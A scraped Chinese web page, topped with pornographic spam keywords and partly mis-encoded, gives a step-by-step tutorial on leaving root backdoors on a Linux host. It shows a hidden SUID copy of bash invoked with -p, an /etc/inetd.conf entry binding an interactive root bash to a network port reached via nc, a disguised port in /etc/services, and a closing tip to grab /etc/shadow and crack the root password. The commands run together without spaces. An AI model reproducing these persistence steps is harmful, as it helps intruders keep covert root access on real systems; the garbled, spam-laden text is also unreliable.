好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁(yè) > 知識(shí)庫(kù) > CentOS小心被suid shell與inetd后門(mén)利用的詳細(xì)講解

CentOS小心被suid shell與inetd后門(mén)利用的詳細(xì)講解

熱門(mén)標(biāo)簽:電話外呼系統(tǒng)解決方案 辦理400電話的好處都有哪些 怎樣在北斗地圖標(biāo)注商戶 太原外呼電銷(xiāo)機(jī)器人軟件 廣州點(diǎn)撥外呼系統(tǒng)多少錢(qián)一個(gè)月 日立hgp外呼線路圖 貴港便宜外呼系統(tǒng)報(bào)價(jià) 仙桃外呼系統(tǒng) 400外呼系統(tǒng) 配置要求

你現(xiàn)在已經(jīng)是root用戶,想留一個(gè)后門(mén)。

系統(tǒng)環(huán)境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切換成為root用戶,并執(zhí)行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

當(dāng)然,你也可以起其他更具備隱藏性的名字,我想猥瑣并機(jī)智的你,肯定能想出很多好的名字的。文件前面的那一點(diǎn)也不是必要的,只是為了隱藏文件(在文件名的最前面加上“.”,就可以在任意文件目錄下進(jìn)行隱藏).

現(xiàn)在,做為一個(gè)普通用戶,我們來(lái)啟用這個(gè)后門(mén):

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

為什么不行呢?

因?yàn)閎ash2針對(duì)suid有一些護(hù)衛(wèi)的措施.但這也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p參數(shù)來(lái)獲取一個(gè)rootshell.這個(gè)euid的意思是effectiveuserid(關(guān)于這些ID的知識(shí),可以戳這里)

這里要特別注意的是,作為一個(gè)普通用戶執(zhí)行這個(gè)SUIDshell時(shí),一定要使用全路徑。

小知識(shí):

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

這時(shí)就會(huì)返回具有SUID位的文件啦。

2.遠(yuǎn)程后門(mén):利用/etc/inetd.conf

我們使用vi來(lái)修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改為:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

開(kāi)啟inetd:

dawg:~#inetd

如果要強(qiáng)制重啟inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

現(xiàn)在我們就可以用nc來(lái)爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小貼士:

我們可以修改/etc/services文件,加入以下的東西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我們可以修改成一些常見(jiàn)的端口,以實(shí)現(xiàn)隱藏。

小編感言:其實(shí)下/etc/shadow文件,爆破root的密碼才最保險(xiǎn)啊!

標(biāo)簽:六盤(pán)水 商丘 公主嶺 雅安 青島 麗水 廣安 河源

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《CentOS小心被suid shell與inetd后門(mén)利用的詳細(xì)講解》,本文關(guān)鍵詞  CentOS,小心,被,suid,shell,與,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《CentOS小心被suid shell與inetd后門(mén)利用的詳細(xì)講解》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于CentOS小心被suid shell與inetd后門(mén)利用的詳細(xì)講解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章